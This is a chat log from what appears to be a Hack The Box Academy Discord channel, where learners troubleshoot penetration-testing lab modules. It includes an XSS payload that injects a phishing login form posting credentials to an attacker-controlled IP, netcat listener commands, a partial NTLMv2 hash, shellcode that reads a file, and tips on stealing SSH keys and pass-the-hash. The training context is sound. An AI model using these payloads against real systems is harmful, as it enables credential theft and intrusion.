#modules
just use the Run command or Windows search
also idk if that's proper arg syntax for remote desktop
@fathom pendant no i have a shell open where i can use powerview or what not instead of that webshell one..i am trying to get into ms01 for q4
why not try and set up a proxy then
there's more than one way to proxy
i'll look into the others
also how are you expecting to get a gui application through a shell in the first place
was going to try netsh, but no go...anyway looking for a way to get into ms01 still
Hey hackers, I'm very excited to take baby steps in hacking with HTB academy! I would appreciate your help in getting started with the priv escalation module. I have become user2 and now i wanna be root. So i go in /root/.ssh. I cat id_rsa, copy the contents, create a new file in my pwnbox and paste the contents into it. Then i do ssh root@IP -p PORT -i id_rsa. After pressing enter the shell just hangs there; I'm not able to see ssh output. What am I missing here?
Note: I'm sshing while being user2
The user you are sshing into as, in this case root, needs the public key inside of ~/.ssh/authorized_keys
Well, whatever is configured inside of /etc/ssh/sshd_config under the AuthorizedKeysFile section.
@prisma spruce Hi, thank you for the response. I'll check it out ⭐
don’t need a new id_rsa
I have never quite understood the point of that restriction.
they need it to be able to ssh from the pwnbox to the target
it's read/write restriction to just the owner of the file
Yes, I know. I just never understood the point of the restriction.
Instead of letting you ssh in anyway, they force you to first change the permissions on the file before you can ssh in.
he’s authenticated already as user2
yes and the goal is root at the end, no?
read carefully where he copied the rsa key from
If id_rsa is inside your .ssh directory, you won't need to include -i id_rsa

stop pushing him away from doing it this way; this is from the getting started module iirc; where they have you do it in a way that's easy for beginners
@surreal nymph are you trying to ssh from the pwnbox/attack vm? if you're doing it from the target system where you're user2 it will cause issues
you need to make sure the terminal shows your username; not the user2 username

Does the module tell them how to add things to their keyring or their config file? If not telling them that they can but don't need to do that doesn't seem wrong.
it does not
the module tells you about copying id_rsa
you're adding unnecessary complexity to someone that's starting out
while yes that is something they can do, it defeats the purpose of learning if you're having them do extra unneeded steps
they have the root rsa key; no need to do anything extra
I dunno. Not having to type out -i id_rsa seems like fewer steps to me.
it's more steps to add it to the keyring my guy
whereas it's simpler to keep the idea of the rsa file as its own standalone object to prevent confusion early on
You don't need to add it to your keyring for that one.
you're coming at it from a more experienced perspective
it also reinforces the idea that this file is what opens the door
@fathom pendant I logged in via ssh root while I was in my pwnbox
Why was I not able to login to ssh root when I was user2?
you can't ssh to a machine you're already using
is the short of it
Oh yes !
Right !
I missed that
Thank you everyone for chipping in with your thoughts ⭐. You guys are root!
the long end is- networking constraints on the port; causing traffic conflicts where it's trying to talk to itself on a port that's already occupied
?
I'm pretty sure you can ssh in to your own box multiple times
You can right?
you're ssh'd into a machine and trying to ssh into itself is an issue
That should not be a problem
It would still pick a random port to go outbound with.
it's also just box constraints

:P
i know you can ssh with multiple users to the same box
at the same time
Had fun with this box
it's just these labs are notorious for having some dumb quirks
Yeah, then it's a box issue not a ssh issue.
ssh constraints just happen to be one of them
also i'm referring to ssh callback to a box you're already on -
as in being a user on the box
and using ssh to try and switch user
Yes, that should not be a problem.
i've not seen it work ¯\_(ツ)_/¯
could be that inbound connections are disabled from localhost
It does work as far as I've used ssh, you could disable inbound connections from localhost but that's not the default case.
Yeah, it wouldn't make sense as a default because there should be no inbound/outbound conflicts. It's not really how ssh works.
yeah i was making some dumb assumptions since i've never seen it work in the context of the labs
Or any protocol, for that matter.
like it being dumb to use rdp on your own windows machine
Yeah, that would be dumb lol
but i guess idk if it's not explicitly disallowed by default
like it doesn't make sense to ssh to yourself is what my initial thought was going off of
well this isn't critical thinking is it
I've done that in a scenario where your machine is connected to a VPN tunnel and you'd wanna do some internal routing and stuff. I don't exactly remember the problem I was fixing, but ssh came in godly.
like i said: had to apply
don't need to be a dick about it
"Critical thinking is the key to success."
Puzzle completion animation in Professor Layton and the Curious Village.
i was just going off of, at the moment, i hadn't put much thought into it considering how dumb the concept is
no need to keep trying to go at me over it
:P i had a dumb moment and was corrected
it happens lol
That's the only localhost connection usage I experienced, or else I would have thought that self connecting to ssh would be the same as self rdp lol
yeah
like you can see where my thought process stopped
like "nah that's just dumb so surely it's just not allowed"
i gotta also remember "this is technology, dumb shit happens all the time"

now i know what to try instead of exfil rsa keys next time ¯\_(ツ)_/¯
or if I have write access, just put my key in there
idk why i always seem to manage to fuck up scp
it's like the most simple thing
scp source destination
yet SOMEHOW
i fuck it up
I had to mess it up a lot to get the hang of it too xD especially the -P instead of -p
I remember it as what's in left gets moved to what's in right
I can never remember the syntax for scp unless I look it up, so I almost always use sftp.
cd/lcd, put/get is much easier to remember
then i run into where it doesn't do anything even when i swear i did it right
this is why I just have an nginx server running to upload to
and download tools from
wget doesn't fail me (until it comes to windows, and i gotta remember -Outfile)
one thing that at least helps me remember some commands is just that they sound like what they do if you say them out loud
True lol
telnet? tell the network?
Off to solve nibbles 😍
Btw, if i use metasploit always, will that make me a 'script kiddie'?
yes
I love the ease of use of msf though ❤️
KERBEROS ATTACKS skill assessment someone can give me hints
metasploit is a crutch
there's often better (and more controlled) ways to do what you want than msf
Ummmmmmm
What's the content of the file: \DC01\Secret Share\flag.txt? this one
it's fine when starting out; but usually there's a PoC (proof of concept) code that you can read to understand how the msf exploit works
Thanks @fathom pendant
Yes, I saw a guy had ported that exploit to python in his repo.
that tends to be the case with a lot of the exploits
Looked scary
considering how old they are
not much scary about it if you know what they do ¯\_(ツ)_/¯
Yes, true that
the only way to look is to actively seek the knowledge
a lot of the attacks and stuff in the pentester path are done without msfconsole
⚡
does the exploit or whatever exist there? probably: but it's still good to know alternate ways
especially if you're in a position of working off a compromised machine that might not have tools installed
and running tools will get you caught by AV/EDR
Wowww
Yes
And if it's a Windows machine and my exploit needs to run on the victim machine, then Ruby or Python scripts will be useless
guy from fortnite
Hi guys, I need your help with the module Windows Forensics.
I am unable to RDP into my target 10.129.228.172. Please help me; thanks!
Why are you using ssh?
Don't we use ssh to connect with Targets?
Do you know what the right command for RDP is? This is the first time I came across an RDP connection requirement to connect with the target.
Usually, it's been SSH so far.
xfreerdp /v:IP /u:User /p:Password
Thanks sire!
This was insight; I will keep this in my mind in future.
lol yes it helps to read the instructions
Currently following the “Information Security Foundations” Path. I just finished the Introduction to Network Traffic Analysis module. But I haven’t done the Introduction to Command Line nor the Intro to Bash Scripting, should I do that before proceeding to Intro to Active Directory? 🤔
My goal is CPTS and Bug Bounty Path
That depends on your knowledge. If you know the basics, you don't need these modules. But I'm sure that even if you have knowledge, you'll still learn a thing or two in these modules
I don't recall seeing anything in the intro to active directory module that required knowledge from those two modules, and especially not introduction to bash scripting.
HTTPS & TLS Attacks: problems with running the TLS-Breaker tool. After installing with JDK-22 and JDK-17 I get a lot of errors when running Bleichenbacher, Heartbleed etc. What version of Java can I use without errors?
I see. My doubt is actually just the order. I intend to do it all, the problem is I don’t have cubes for the Windows Command Line module nor the Bash module. I was intending to finish the “free” stuff before applying for the Silver Annual subscription
It's best not to do them before you get the silver annual subscription.
Oh! Then I guess I’ll buy it now
Are you a student?
No
Yes, you can do it that way.
You won't need Bash for AD. The command line rather, but the required commands will certainly be shown.
Don’t have a student email, nor am I from America
Oh. I did the math for it a few days ago. It isn't really worth it, but if you do get it you're better off not doing the tier 0 modules first because you get cubes back for them that you otherwise wouldn't, which amounts to ~$15.
Does anybody know if the subscription is activated immediately upon applying to it?
Yes, the subscription is active immediately
Thank you!
And thank you for the help 🙂
Hi guys can u pls help me? I got stuck at Broken Authentication Assessment, I found the admin/support users with the country code and found that the cookie is made of the username formatted to md5 and base64 but can’t put those together. Keep getting user admin.us can’t have requested role (or something)
Any help would be much appreciated
hello i need help with the Windows Event Logs Skill Assessment
I just completed the Footprinting module. It was a challenging read due to some grammatical errors; most of the stuff kinda just flew past me. I thought it was great although it could've used more commands in the IMAP/POP3 section for fetching emails. Managed to do the hard challenge all on my own without help, was a fun little gag to hide that database, almost missed it.
@fathom pendant my apologies, i dm'd you without asking
What exactly do you need help with?
the 3rd question which is By examining the logs located in the "C:\Logs\PowershellExec" directory, determine the process that injected into the process that executed unmanaged PowerShell code. Enter the process name as your answer. Answer format: _.exe
I've filtered by 7, I ctrl-f'd every kind of thing imaginable and still nothing. btw i did use find even without filtering by 7
Take another look at how you can recognize a process injection with Powershell.
I did try the create remote smth smth I found from google
You don't need to google it. Look again in the module to see what exactly happens during a process injection with PowerShell. Then you will also know what to look for
Not only
I'm not gonna type BCS it's not permitted but I found the exe that used to run it
I can't use process hacker here tho
You don't need process hacker
Those are the tools used for process injection
You can see everything in the Event Viewer
Event id 7?
Look in the module
There is no MacOS Machine
buy one
you can do the module without having access to macs, I did it
just need some googling
That's some big balz. Lol. Gg
I think someone mentioned it before and they used an ID not mentioned in the course for remote threads that also works.
But payloadbunny's advice stands, trying to analyze how they detected remote injection then trying to replicate it
Yes, you can find the answers, but you can't do the exercise
I remember some years ago some weird way to get a macos VM, I never tried it but it was an annoying process. Have no clue how it's at now
I don't know, since I have a Mac, I didn't really care
I have 4 "windows" 0 macs lol
Actually 2 windows and 2 proxmox/windows
There is no machine in this module.
You must perform the exercises with your own Mac
In Cross-Site Scripting, Phishing Section
I need to use this javascript to remove the input bar as well as add a phishing login form
document.write('<h3>Please login to continue</h3><form action=http://our_ip%3E/<input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');document.getElementById('urlform').remove();
Problem is browser is not letting me use semicolon ; in this so second query which is document.getElementById('urlform').remove(); fails to execute.
I tried Firefox and Chromium.
I need a way to run both queries together.
I did that tho, idk what else is left to do, I've been on this for hours now
What's the section name?
I don't remember that section exactly but if you're sending the payload through a url you might want to url encode it
Analyzing evil with sysmon
Oh don't tell me it's etw
I don't have my notes for this organized. Give me a few
Sure
You only need the Event Viewer.
Take another look at question two. The questions are related.
If you're directly injecting this into the field, that's most probably why it's failing
This is supposed to be in between script tags, that's how the semicolon gets interpreted as inline js.
I know the answer for question 2 is what I use for 3 but can't find any other exe that's mentioned
I wrote every exe I saw and all came wrong
Take a look at the ||ProcessID||
Noo f way I ignored that exe like 500 times now it's so camouflaged
I knew that pid and filtered it but never wrote it
Thanks
my rdp sessions give me black screens 80% of the time in the last few days. Anyone experiencing the same ?
it's a screensaver, just press enter
you were asleep last night when we needed you most 😢
Not asleep. Just AFK without my phone in hand. I saw the aftermath though.

they posted a token supposedly theirs a minute ago mto
it's as dumb as it sounds
Thank you for letting me know.
¯\_(ツ)_/¯
Just finished the HTB Getting Started knowledge check. Glad to get it done, that one was very frustrating. It seemed that I kept having to regenerate a new IP as the system would either lock me out or in a few cases be extremely slow
in the Attacking Common Services module, SQL last exercise, I need to connect to the DB using the cracked password, which I got. But I keep getting
ERROR(WIN-02\SQLEXPRESS): Line 1: Login failed. The login is from an untrusted domain and cannot be used with Integrated authentication.
my command:
impacket-mssqlclient msqlsvc:[password]@10.129.228.184 -windows-auth
I searched through this channel's history and it seems to be what others also did and it worked for them. So I don't know ...
try changing vpn region
If you all have any suggestions. I am running my Kali on VirtualBox. It seems to be the only VM that I trust now. I have a VMware licence but I prefer VB
this should work, reset the machine and try again
already did
can't seem to be able to
using the pwnbox?
then you should be able to change vpn region through the menu
then download a new connection; terminate the existing one
¯\_(ツ)_/¯
is that a vpn region issue?
¯\_(ツ)_/¯
maybe? sometimes things are buggy
also do terminate then restart the machine if you haven't tried that already
Hello, i'm doing the Security Session and i have some trouble with the last one. i did an xss in the profile julie and tried to steal the cookie with this url http://minilab.htb.net/submit-solution?url= http://minilab.htb.net/profile?email=julie.rogers@example.com but nothing. what am i doing wrong?
your user is misspelled if that's really your command
is it supposed to be rodgers?
it wasn't to swodax, haven't done that one
none of us can, and so we hack
hey that's my line
I shamelessly stole it
Damn I think it was a misspelling ... I got with the pwnbox though
yeah I saw your message. Thanks for the help guys
no problem
mssql
the extra s is important
though it would be devious to make a box like that
The error message is weird if it really was a misspell
not really, it's a generic message for wrong login details
yeah, depends on what you're trying to do, what flags you're using, which part was wrong, good to note everything down
I am working on RDP and SOCKS Tunneling with SocksOverRDP and I am right at the end to get the last flag, but I keep getting disconnected for different reasons. I have restarted the box several times and I have selected the modem option under experience but I keep getting this. I just need what is in this file and I can't click it before it times out:
It's been like 10 min
Lol wrong reply
I tried URL encoding with just semicolon and then with whole query, it didn't work out. I'll keep trying. Thanks.
I'm using <script> tags
Wow dynamic port forwarding is so awesome, thinking all day about it, first time using it since yesterday 😃
wait till you find out about ligolo-ng
it'll blow your mind
unfortunately not in the module though
checked my notes, definitely requires URL encoding
I'm on the Module: CROSS-SITE SCRIPTING (XSS) Section: Phishing
I'm not on the questions yet, just going through the content. I'm at Credential Stealing. So in the example it say:
"So, let us start a simple netcat server and see what kind of request we get when someone attempts to log in through the form. To do so, we can start listening on port 80 in our Pwnbox, as follows:"
sudo nc -lvnp 80
But on the Pwnbox port 80 is obviously already in use.
So I changed it to port 81.
But that's not going to work for the content of the page right? => "Now, let's attempt to login with the credentials test:test, and check the netcat output we get (don't forget to replace OUR_IP in the XSS payload with your actual IP):"
I can enter the payload from above, working fine.
document.write('<h3>Please login to continue</h3><form action=http://IPHERE><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form> <!--');document.getElementById('urlform').remove();
But upon entering test:test it's not going to do much right?
So how can I get it to capture the request (without using further content below of the module) , or will that just never work like the example in the module itself?
Because then the module's description should be changed since the example would never work?
Can I DM to figure it out with you?
sure
since you're changing off default just add :PORT after IPHERE
so http://IPHERE:PORT
I think I tried that but nothing came up on netcat. Lemme try again
But it's kind of weird that the content suggests using port 80 when it's already in use
because in most instances people aren't using pwnbox
they're using their own vm and likely not having an http server or something running on 80
you can try having it listen on 8080
yea but it specifically says PWNBOX
"can start listening on port 80 in our Pwnbox, as follows:"
huh; odd
suggest the fix in erratum
if you verify your main labs account with the discord you can post screenshots btw
the instructions are in #welcome
You can always adjust the ports
As long as you understand the concepts, nothing stops you from experimenting
will do! thx!
yea true but it was new for me 😛
I have restarted the box. I have logged in via rdp and accepted the cert. I keep getting this now:
80 was used as an example for convenience sake tbh
so the example doesn't need to specify port
so I tried adding the :81 again but nothing pops up on netcat 😭
I'll continue to debug it
You need to make it to pop up
I'm not on the actual questions yet, I'm just going through the content of the page, and there is no pop up talk 😮
what he's saying is that you need to make it work
not just expect it to magically do something :P
Anybody there to contact me regarding „Attacking Common Applications / Exploiting Web Vulns in Thick Client Applications“?
I'm still confused about what he meant and if he understood me xD
I'm just following the tutorial/guides first? of just listening with netcat
Why don't you just ask your question, what are you stuck on and what have you tried, then someone can help
just follow the module
make the slight adjustments based on the restriction that 80 is occupied
Aight 😛
I am stuck while downloading the fatty-server.jar file. Pretty sure I made mistakes while editing the open function. But tbh I feel like this module completely overkills the smooth pentester path. Nothing taught in this path will get you there on your own. And I am pretty sure not many guys will do further than just copy and paste this one. I can’t take something valuable from this without more background or experience in this topic. But maybe I am alone with my opinion…
no, that's an extremely popular opinion
it's not on the exam fwiw, that's why most would consider doing the writeup fine
the thick clients was an EXTREMELY late addition to the module
these sections have no place in the path, but the writeup or ippsec video for Fatty is how most people get through it
like some people were 99% of the way through the course or already 100% before adding it
it's literally based around an insane box for a path that's medium at most
Yeah I understand what to do next so that’s fine for me. But I don’t get it done right now. I wanna do the CPTS after Christmas and am a bit stressed bc of time constraints. Then you hit something like this one … 😄
like i said: this isn't gonna be on the exam
Morning lads,
I am doing the Footprinting lab (hard) but having some doubts whether I am on the right path. I enumerated the services and am trying some dictionary attacks for pop3 and imap using hydra but it is taking forever. Is this the correct vector? I'd appreciate a small nudge.
I haven't scanned any udp ports. I am on it. Thanks!
? I thought snmp uses udp ports
for the hint of where to start: read the mission brief carefully
that'll tell you what to look for
do you mean the very first text on the page explaining the scenario?
yes
usually reading the scenario should give you an idea of what you're looking for
hello, in the pivoting module it states "Our Meterpreter session should list that our incoming connection is from a local host itself (127.0.0.1) since we are receiving the connection over the local SSH socket, which created an outbound connection to the Ubuntu server. Issuing the netstat command can show us that the incoming connection is from the SSH service.". Could someone explain to me why the connection is received from the localhost? It seems hard for me to understand why this is happening. I assume this is something to do with how the ssh socket works, but i don't really have a clue about it
ssh receives the connection, then passes the connection to meterpreter on your localhost
Hi. I'm losing my mind. I am going to try and ask this with as few spoilers as possible. On the Skill Assessment, task 2, for Intro to Assembly, should I be on the lookout for a spelling error by any chance lol
If someone would like to DM me to discuss further or possibly give me a little nudge that would be excellent. I'm running out of ideas lol
No, the file is named like that on purpose so it fits within 8 bytes with 0-termination
What are you struggling with? Can’t get the payload small enough?
See I thought the file was on purpose, and I feel like my code is small enough but I am still getting hit with Failed to run Shellcode every time
I don't want to post any spoilers, would it be ok if I sent you a dm?
Sure
Hi guys, can you help me with something? I just finished AD Enumeration & Attacks - Skills Assessment Part 1 but I want to clarify something. I am inside a windows host, I can scan a network with a loop in powershell; let's say I find 4 alive IPs, is there a way to know the computer name of each IP? for example, IP 1 is DC01, IP 2 is MS01, etc.
can make a smb connection to get the host name
basically what crackmapexec/netexec do when you do a smb scan
nslookup, nmap, smb like above (you can use cme)
Hey, I'm stuck in the Attacking Common Services module in the lab of attacking databases. I found the password of mssqlsvc but I can't connect with it to the db or switch to its user or execute commands with its permissions. Any hints?
If you're on a victim I think you can try checking the routes/arp/dns cache too but idr specific commands for those
Attacking SQL Databases yeah? did you try connecting with mssqlclient?
Ok, ty. I will take a look at that.
Yeah, tried with -windows-auth but I get an error of untrusted domain, and without it the password just fails for some reason
make sure you're using both 's'
mssqlsvc not msqlsvc
I run: ||python3 mssqlclient.py mssqlsvc:$PASS@$IP||
use -windows-auth
and you should remove the password since that's the answer to the previous question
^
Changed it and thanks! It errored before about untrusted domain and now it doesn't for some reason
you probably misspelled the user
ngl it's the most common and easy thing to do with this
like one of the modules you have htbdbuser or something along those lines LMAO
https://www.youtube.com/watch?v=QtmXHu6GWck demonic c2 still insane l4-l7
probably lol
what module does this relate to
One more question, ||I had to crack the mssqlsvc hash using the password list and rule from the Password Attacks module, and the actual password didn't appear in the Attacking Common Services module resources->pws.list. Is the password list from the Password Attacks module relevant for all the other modules?||
it's so common and easy to make that even though I've seen it dozens of times I still occasionally miss it at first glance when someone posts their term output wondering what's not working
i believe it's in rockyou
It is, but why do they provide pws.list for the module and then don't include the necessary passwords in it?
gotta think outside the box sometimes
also i think the example shows using rockyou for cracking
They don't show a cracking example in this section, but in the smb one they do use rockyou
order of ops for the password attack module in list usage:
Discovered lists within the lab -> mut pass list -> reg pass list -> rockyou
this is from a separate module
from pw attacks
ah then 99% of the time just rockyou
^
Okay thanks!!
rockyou is just the general ctf agreed upon list that if you require bruting in your challenge the answer needs to be in rockyou
they really don't stray too far from rockyou (because that would defeat the actual purpose of what it's teaching you)
can someone give me a hint on what remote tool i need for question 3 in skill assessment 2 active directory, tried literally all i know
What was question 3?
so i recently was planning to get into developing windows GUI apps .... do i need to be a software engineer to develop modern looking gui apps or can i use c++ to do it ... i did learn some good fundamentals in c++ and i wanna get into developing gui apps ... can anybody give me resources for that so i could develop my skills plz and thank you
i need it for my capstone project ... i am planning to make a C2 framework and i just have 6 months
Submit the flag on ms01 from C:\flag.txt but any tool i know doesn't work
giving the module name would be useful
use visual studio tbh
it's a decent IDE for C/C++ and allows you to better visualize it
bing chat is pretty damn good!
AD skills assessment 2
Yep
oh right I'm blind
i mean it looks like it pulled it straight from htb forum
that's also literally what the module tells you to do
the hint should help there, try different protocols to access ms01
you'd have gotten the same information from just doing the module
i'm still impressed by bing chat this is so cool
If I hadn't, I wouldn't be writing here. I lost over 2 hours. As I said, I tried all I know
it's not impressive that it's telling you just the basics of a file upload attack
like this saves so much time and it's amazing to say the least... it's good for people like me who have severe adhd 😄
What have you tried?
do you have notes on it? cause I don't remember lol
someone told me that I can do some things with C++ like have a backend in C++ and a web frontend in electron and make them talk to each other in any of the IPC methods, and package them in a single exe.
also just putting this out there you can do the whole electron stuff while still keeping your frontend cpp, if you wanna do the whole stack in C++ since wasm exists now
i mean the module also gives you example payloads
i really don't see what the huge boost is
this is literally just what the module tells you to do though???
evil-winrm, psexec, wmiexec, cme
I have the whole chain in my notes yeah, just haven't added the questions in order to immediately be able to say what the way is based on the question itself
ah okay you can take over then 🙏
I mean that's just randomly throwing tools at it, have you tried every protocol with cme and do you have valid credentials
No problem
Looks like you were correct even without notes
Did anyone experience any issue installing crackmapexec on Parrot? There seems to be a few python packages missing from the repo
I also tried pip install but no luck
instead install netexec
Crackmap is no longer being maintained, and a lot of the devs moved to netexec
it has the same features
is it on the package manager? I can't seem to find it.
thanks!
hey. this doesn't have anything to do with the modules but i need some help
i wanna install parrot os in my bios, like i have to choose if i want to run windows or parrot os. does anyone have any suggestions on what to do?
Follow the instructions on the parrot website
Has anyone gone through ADVANCED XSS AND CSRF EXPLOITATION, more specifically the section Bypassing CSRF Tokens via CORS Misconfigurations? Having trouble with the question at the end; for some reason every time I try to test out my payload I get invalid CSRF token. I've made sure I am extracting it from the right HTML element as well. Was wondering if anyone can provide any pointers?
EDIT: figured this out
I am doing the Hard Firewall and IDS/IPS Bypass Lab for the nmap module and can't seem to find the flag. I've found the service they moved and scanned it while looking at packets with packet-trace but I'm not seeing anything. I've also tried netcat and telnet for banners. Am I looking in the right place?
Nevermind, lol
I am doing the common service attack DNS chapter and for the exercise you are asked to find all subdomains and the flag should be amongst them, so I ran a brute force attack against the server with subbrute and I only got 3. None of them contain anything interesting. I ran this for like 30 minutes. Am I doing something wrong? I used the small wordlist included with it.
your resolver.txt should have the target ip in it: after you find the subdomains from the tool you should dig txt [subdomain].inlanefreight.htb @ip
or dig axfr [subdomain].inlanefreight.htb @ip
man I don't get DNS ... if I do an A, TXT or whatever I get nothing and something SOA. I just did an axfr and it's showing me a TXT and an A entry all of a sudden
thanks
yeah i think you have to include like type=txt in dig
in my experience DNS queries are always hit and miss. Tools don't all react the same to it, it seems
It's always dns
Can someone help me with this:
Try to exploit the upload form to read the flag found at the root directory "/".
I am trying with something like that, but without an upload folder it's useless
I'm working on the documentation and reporting practice lab.
I want to get the flag on the Administrator desktop of DC01
I have found and cracked a bunch of password hashes. Several of those credentials allow me to log on to DC01, but I don't have permission to read files on the Administrator Desktop.
I've tried using the Python version of Bloodhound to figure out which users have admin access over DC01. I've also dumped ntds.dit using CME and gotten a ton of hashes. I haven't found any that are crackable.
In the given notes, I see a hash that was retrieved by using Responder, but hashcat can't crack it. I cracked three other hashes I got using Responder, but none of those accounts allow me to read files on the Administrator desktop
I don't think anyone can quite tell what you are trying to do. You seem to be posting an image which contains some tags about /etc/passwd?
Yes i am trying to see if xxe vuln is working
he's trying to get an xxe payload to get the /etc/passwd file from the host system that's running the web server
the image tag is merely to bypass upload filter restrictions
is your XXE supposed to return anything?
Yes
you dont need to crack ntds.dit hashes
just pth to log in as domain Administrator
What is it returning? All I can see is a string of something. An image of some sort?
Its returning what i have to it
what you have? You mean what you have sent?
Because it's just giving the file content of this .svg in an IMG tag
I have some trouble with the WordPress Skills Assessment. I am stuck on question three: "submit the contents of the flags file in the directory with directory listing enabled". I don't understand how to approach this prompt. I already found some directories with OWASP, I reviewed each one and did not find the flag.
This payload with xxe
I added the target ip to /etc/hosts but I can't get this question.
But its returning IMG tag with src as this payload content
Not the value payload should return
Any help will be very appreciated!
so it's essentially just sending back what you have sent?
then maybe it's not about reading a file
he's trying to read the file as PoC that his coding is working
Maybe it's executing your command, but maybe it's also not sending back the output
How could it execute it
I dunno, you said it should
yeah, but the output might not be where you expect it
tbh it doesn't sound like you entirely understand what he's trying to do
I am not, I am just going off what's he's saying.
then you're not really "helping" if you don't know how to actually fix/push the code in the right direction tbh
can you double check that you've followed the section as it's described?
no one is helping him, so I just go off what I know. He very well could be doing the wrong thing. It's just general troubleshooting
Wym
Like i dont understand how to make this xxe payload work
And that's why i ask for help
this is from one of the sections in the file uploads module yeah? reread the section, make sure you didn't miss a step
yes it can
^
depending on the situation
the module specifically covers doing so with svgs for instance
Ok but will it also work with PNG signature
I am just wondering isn't that an issue
that I don't recall off the top of my head
Thank you very much! Got the flag.
cmon 00:01
Intro to assembly language skill assessment task 2, getting "failed to run shellcode" using:
```nasm
global _start
section .text
_start:
; push './flg.txt\x00'
xor sil,sil
push si
mov di, 'xt'
push di ; push NULL string terminator
mov rdi, './flg.txt'
push rdi
; open('rsp', 'O_RDONLY')
mov al, 2 ; open syscall number
mov rdi, rsp ; move pointer to filename
syscall
; read file
lea rsi, [rdi] ; pointer to opened file
mov rdi, rax ; set fd to rax from open syscall
xor al, al ; read syscall number
mov dl, 24 ; size to read
syscall
; write output
mov al, 1 ; write syscall
mov dil, 1 ; set fd to stdout
mov dl, 24 ; size to read
syscall
```
which produces 4030f6665666bf7874665748bf2e2f666c672e747857b0024889e70f05488d374889c730c0b2180f05b00140b701b2180f05
not sure were I am going wrong
God people need to learn formatting
I'm just a normal person, not a God person.
I'm not helping you now out of principle of you being a smartass
Btw it's more readable if you wrap code statements in ``` before and after
Though since your account is unverified, automod likely will yeet it
Can someone take a look into my help post regarding wordpress skill assignment?
Also can someone help me with the file upload skills assessment
@thorn urchin pls i think you can help me with these or at least give me a hint
Hello everyone. It's becoming really frustrating to work with hashcat. I get exhausted every time.
I am trying to crack an NTLMv2-SSP hash. I have recovered a couple of hashes from Responder, but when I try to crack them I get exhausted. I'm not sure if there is a formatting error in my hashes or not
but its very annoying
find directories with with listing enabled and look through them
if the format is wrong, hashcat will tell you, if you can't crack it with rockyou then it's not supposed to be cracked
yes that what I thought. But the question is literally asking me to crack one of the hashes I found
LLMNR from Linux, wley::INLANEFREIGHT:cd4d239f7b9778a3:324060F4B57AD6429A212E016F0AC2BE:010100000000000080
first part of the hash this is.. the hash is quite long
Sadly I am incapable of providing advice if I do not know where you're stuck and what youve done or tried.
One day I'll achieve psychic resonance and read minds but I'm not there yet
forgive me for my ineptitude
ah should I use the /usr/share/responder/logs/ file as source directly into hashcat?
Not necessary
sometimes hashes are long
it seems to go on longer that way.. when I try it differently it gives me an exhausted messages rather quickly
Hashcat should crack it if you use the ntlmv2 mode
I am using 5600 which is the correct mode
are you using rockyou?
yessir
which module
Feel like I'm missing something obvious for the Footprinting lab, but I connect to the FTP server and when I enter "ls" it's not loading the file list
llmnr from linux
Any help?
llmnr from linux isnt a module
ls -la
which module are you doing
should be AD
aight this is driving me wild. It's late, I'm going to bed and will try again tomorrow
good night everybody
Hey Marcie, again another dumb question, when I do that command for some reason it's not showing the name of the directories or files
Skill assessment yeah? Make sure you're on the right port
Can you specify the port with the "ftp <IP>" command? Netcat times out whenever I try to connect and telnet is not recognizing any of the commands I put in
Yes it's just putting the port after ftp user@ip port
make sure the password is in one single line
I think that is my issue, I don't fucking know what listing enabled is
Thanks MarcieLee.
For what?
Lmao I don't recall interacting with you
The information you are giving is helpful and useful.
¯\_(ツ)_/¯
literally just google wordpress directory listing enabled and look at the images, that's what you should be looking for
got it, will do. Thanks!
@fathom pendant need help once again, I got into the proxy ftp server, but I cannot for the life of me find the flag.txt file. Looked in all the directories I found and cannot find it at all
Because that might be the start: not the end
Hint: ls -la reveals an important directory
I've been doing ls -la to see the file list, and the 2 directories I have gone into didn't have the file
Sorry I'm just having a hard time on this and can't find anything from searching ftp commands
Easy lab, yeah?
Yes, I'm frustrated because I had no problem with the FTP before but I cannot figure this out at all
ftp ip 2121
username
password
ls -la
It worked for me
If you did username@ip I apologize that was my bad I forgot ftp is dumb that way
I've been doing exactly that. No file there and then I go into the 2 directories .cache and .ssh and neither one of those has the file either
Think carefully about what you just said
ls
Like I said ftp isn't the end, it's a step
Do me a favor, just try and ssh into the target and see what that tells you about this info

You figure it out? @swift forge
So I downloaded the 3 files from the ssh directory, but when I try to ssh in with the keys I'm getting a "Warning: Unprotected Private Key File" message and it denies me
Remember, key files need special perms, also you only need one of those files
So I believe it is the one with the private key, but I'm not sure how to protect it to use it
it's december, not NNN anymore 
Module: Pivoting, Tunneling and Port Forwarding
Section: Port Forwarding with Windows Netsh
i rdp'd into the Windows pivot host
i established the port forward
now i try to connect from my attack box through the pivot to the victim, but my connection gets refused.
xfreerdp /v:ip:8080 /u:victor /p:pass@123
i don't know where the fault is
You want it so only the owner can read/write the file
So it should just be execute permission correct?
Should've waited 1 sec lol
Why do you need to execute a key file?
Instead of adding the port to the ip add it with /port:
nah still
Where are you getting the .150 ip from?
ipconfig in pivot
172.16.5.150
@fathom pendant finally got it. Thank you again for being a tremendous help.
Ipconfig shows the localhost ips
But that's not how the netsh forward works lol
You're forwarding the request to the next step in the chain
You need the target ip, in this case 172.16.5.19 as indicated by the question to be forwarded to
Had to double check the netsh command: but yeah the command takes the listening port, and forwards it to the specified port and specified system
these windows commands annoy me, linux commands are so much cleaner imo
Psst. You should checkout ronin-exploits. Much simpler/cleaner syntax for writing exploits than MSF.
Did you just search the server for mentions of ruby so you can respond to a message from yesterday to shill your tool in an academy module discussion channel
Hey everyone I'm new to cyber security
In fact I'm new to almost everything
Can I get some help ?
Doesn't really matter I was just wondering if anyone here can help me at my first steps
I linked it twice
Reading comprehension is an invaluable skill
Maybe third time's the charm
Damn 😅
Anyways thank
But wow, that was really something
@thorn urchin dum question
English isn't my first language so it's pretty bad
Is there any way I can change the language or something?
nope its an English only server unfortunately
If you mean of Discord itself, check the settings, you can definitely change it
Forget about it
Another question
Is it safe ? Like no virus ? No one trying to hurt me (I literally have nothing) ?
Just wondering
THANKS!!!
its a public server so no promises on that. But if you do see something suspicious, feel free to report it
Hello All! I'm stuck on the following question for the "Password Attacks" module:
" Find the user for the SMB service and crack their password. Then, when you log in, you will find the flag in a file there. Submit the flag you found as the answer."
I'm able to sign in to smb with username and password but none of the commands work for me to find the flag.txt?
Smb is a windows protocol
So dir and type are gonna be your friends for enumerating
I have tried both but it seems not to work
Getting this error:
NT_STATUS_ACCESS_DENIED listing *
Then that user can't access smb shares
Guys!! Are there any other websites that teach hacking except hackthebox?
Tryhackme is good for beginners
